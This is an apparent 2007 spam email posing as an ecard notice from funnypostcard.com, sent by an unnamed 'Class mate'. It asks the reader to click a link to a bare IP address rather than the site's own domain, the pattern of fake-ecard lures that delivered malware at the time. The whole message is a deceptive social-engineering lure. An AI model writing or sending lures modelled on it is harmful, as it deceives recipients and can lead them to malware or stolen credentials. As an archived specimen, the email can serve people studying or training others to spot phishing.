Subject: Class mate sent you an ecard from funnypostcard.com!

From: "funnypostcard.com" <[email-masked]>
Date: Fri, 10 Aug 2007 15:14:42 +0200

Class mate has created an ecard for you at funnypostcard.com,
the Internet's most popular greeting card service. 

Your greeting card ID is: b161d496d2989907cd64e28cae3d7703a3b01bd 

To see your custom greeting card, simply click on the link below: 
http://76.109.12.97/?b161d496d2989907cd64e28cae3d7703a3b01bd

Send greeting cards from funnypostcard.com whenever you want by visiting us at: 
http://funnypostcard.com/
Copyright (c) 1996-2007 funnypostcard.com All Rights Reserved